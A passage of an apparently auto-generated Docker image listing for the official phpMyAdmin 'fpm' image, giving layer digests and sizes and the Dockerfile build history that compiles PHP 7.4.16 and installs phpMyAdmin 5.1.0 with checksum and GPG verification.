MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:7b603f7372a2390997a547c017682bbccabf5f4ff2e17c5a7ad87a6ece073a18`
Last Modified: Wed, 31 Mar 2021 07:10:00 GMT
Size: 70.4 MB (70355229 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b0372695364ccf5f16a3ecfb0185b21a24a456e1867b911685b0a4288ad4b313`
Last Modified: Wed, 31 Mar 2021 07:09:33 GMT
Size: 271.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a6102fb158490ba1c6742944504a179df99068d74a0834a4fcb60b2cb06a4070`
Last Modified: Wed, 31 Mar 2021 07:13:06 GMT
Size: 10.7 MB (10655139 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c36bdb0bbdcbbf5cbfb2008f47034c81f0a3976b4e31c0ebeb60bc9ea88bed04`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 493.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3b0e6ff5b63c805b42755f36262309e873aebd4bf5df2733c9d1401cbc3757d0`
Last Modified: Wed, 31 Mar 2021 07:13:12 GMT
Size: 28.3 MB (28334435 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b82b3dfaa5654b6c88b4c3b50a315248699063f78176d3262d60b856395faf24`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 2.3 KB (2271 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:4f05ad8490526e74f3f5d03c95ae786282c6a0de4f57b8fad2088459c7b5a92f`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9ceea2e2edbba463b34b11daa2639178a11bd541e761d683ad165464daa2063f`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 8.4 KB (8448 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0b027dbc53137e3fc12b36d210026c548dc0654808757db78537128584e2cfe6`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 2.8 MB (2821769 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e43fc57d2e294e501b706fd071d1d83e862a0a73bae4f141e0fdaf8356a3e1e9`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:af11c75f444a3d70769a52e28e5ccea84267eab9b6d4d2300896b5c971976e00`
Last Modified: Thu, 01 Apr 2021 07:24:13 GMT
Size: 14.1 MB (14064835 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:afc4d77dedc706925a5799756cf4c7bf5390760c75b9a0b4974cceda5102bc2d`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3e2ee7bf22831e08ad01941197b60358df44b7df96869b5ff9b49e58ef0e3232`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; 386
```console
$ docker pull phpmyadmin@sha256:ac0b7cba6fbf40c57bb1a34146b0d5d2a158d749eecfcf57e55d3aa82ed95fc2
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **165.9 MB (165908612 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:bef0c7937a386956b292a4840b3dc453e5c26b1bc8dc616b592e827ececc5223`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:39:48 GMT
ADD file:d11c47560c0a88a83a3a0ce5af82fc17a07075e877293e4f922f126959810ea3 in /
# Tue, 30 Mar 2021 21:39:49 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 05:38:43 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 05:38:43 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 05:39:07 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 05:39:07 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 05:39:08 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 05:50:24 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 05:50:25 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 05:50:25 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 05:50:25 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 06:10:51 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 06:10:51 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 06:10:51 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 06:10:52 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 06:11:05 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 06:11:05 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 06:17:45 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 06:17:46 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 06:17:47 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 06:17:47 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 06:17:47 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 06:17:48 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 06:17:48 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 06:17:48 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 06:17:49 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 17:06:08 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 17:06:08 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 17:06:09 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 17:06:09 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 17:06:10 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 17:06:10 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 17:06:11 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 17:06:11 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 17:06:11 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 17:06:32 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 17:06:33 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 17:06:33 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 17:06:33 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 17:06:34 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:548dde0830bd6b881c0c068db5a4e39aa720d2a0c5ac3897296a023dda7b3391`
Last Modified: Tue, 30 Mar 2021 21:46:41 GMT
Size: 27.8 MB (27788996 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e98b67b2c4467eacf10bfe3c2eef4cb9d9dc040023f3562413a987120aa2b38c`
Last Modified: Wed, 31 Mar 2021 07:32:04 GMT
Size: 228.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:398a2808bbaf89e86620a60aae2b88361cd9f03abd0f3e9b04b43ddf645bbc2e`
Last Modified: Wed, 31 Mar 2021 07:32:39 GMT
Size: 81.2 MB (81230040 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:409fe28765e314abeb61d6d24aeacc128e934cb1bea417f77e92842b06f368ca`
Last Modified: Wed, 31 Mar 2021 07:32:03 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e1321d1e543a95f500c10fd2d962b71bdbeb025bae6cedd4d31be6d7e43b4f14`
Last Modified: Wed, 31 Mar 2021 07:39:16 GMT
Size: 10.7 MB (10655557 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9645d4e10b074ec4b9844c76680070dc0dee2987c61b33bdc5c318ba081db91a`
Last Modified: Wed, 31 Mar 2021 07:39:11 GMT
Size: 490.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e5e861be914a6b052c85867cd7f9e31f0a394ad36d5ea02fc5a88e6dfeb78d23`
Last Modified: Wed, 31 Mar 2021 07:39:22 GMT
Size: 29.2 MB (29153434 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:39e1aeab3afb9c0a7d850247ca3b592eb09769ff8a5e4e1a0070c48849022400`
Last Modified: Wed, 31 Mar 2021 07:39:11 GMT
Size: 2.3 KB (2270 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9f0c4769162336a241ef03ce19a0e035bad04a12e9dec4ed10a7339f7620cf20`
Last Modified: Wed, 31 Mar 2021 07:39:13 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2da6dc26d71175a03303b1657bd85562afaa23041d6dc6584fcb701bec920952`
Last Modified: Wed, 31 Mar 2021 07:39:11 GMT
Size: 8.4 KB (8449 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:372ca6290ddc9b8c238f6364db263015d0f6feaf6604a05986c2c7a0baad8163`
Last Modified: Wed, 31 Mar 2021 17:09:01 GMT
Size: 3.0 MB (3000408 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a3a11cf6f9b0c047d28c6120b03a6e0045345fa0d37d1fe37c3ef184c8172f63`
Last Modified: Wed, 31 Mar 2021 17:09:00 GMT
Size: 549.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a090e1331443d8d9d16209837a8bbd26d739c47d55fd297b3c8679e71631c5cd`
Last Modified: Wed, 31 Mar 2021 17:09:08 GMT
Size: 14.1 MB (14065372 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:96eee92e578cd65cc9a932e0a10e27ebcfef65c976a96653fa98c882f368ce44`
Last Modified: Wed, 31 Mar 2021 17:09:00 GMT
Size: 1.5 KB (1529 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c6e8840ad9723de1323d0faa6e726e1f0e226c959515cbe9ce7d4a598ee10f99`
Last Modified: Wed, 31 Mar 2021 17:09:00 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; mips64le
```console
$ docker pull phpmyadmin@sha256:6a7d12633e44a4be97ee48cdbbcc1b508165ed30f1cafb8a9a19bc152263d585
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **142.7 MB (142680028 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:c45bc14b2d756d554e640919c989ddbcf0a29701b9724e47bca3937a5b52be25`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 22:09:47 GMT
ADD file:b5b2f1fc18276a3928a2d904fedc2991239e065051f16680662a22627d15e809 in /
# Tue, 30 Mar 2021 22:09:48 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 00:27:37 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 00:27:37 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 00:28:24 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 00:28:25 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 00:28:27 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 00:54:22 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 00:54:22 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:54:23 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:54:23 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 01:38:06 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 01:38:06 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 01:38:07 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 01:38:07 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 01:38:29 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 01:38:29 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 01:51:09 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 01:51:10 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 01:51:12 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 01:51:13 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 01:51:13 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 01:51:15 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 01:51:15 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 01:51:15 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 01:51:16 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 13:28:28 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:28:28 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 13:28:29 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 13:28:29 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 13:28:31 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 13:28:31 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 13:28:32 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 13:28:32 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 13:28:32 GMT
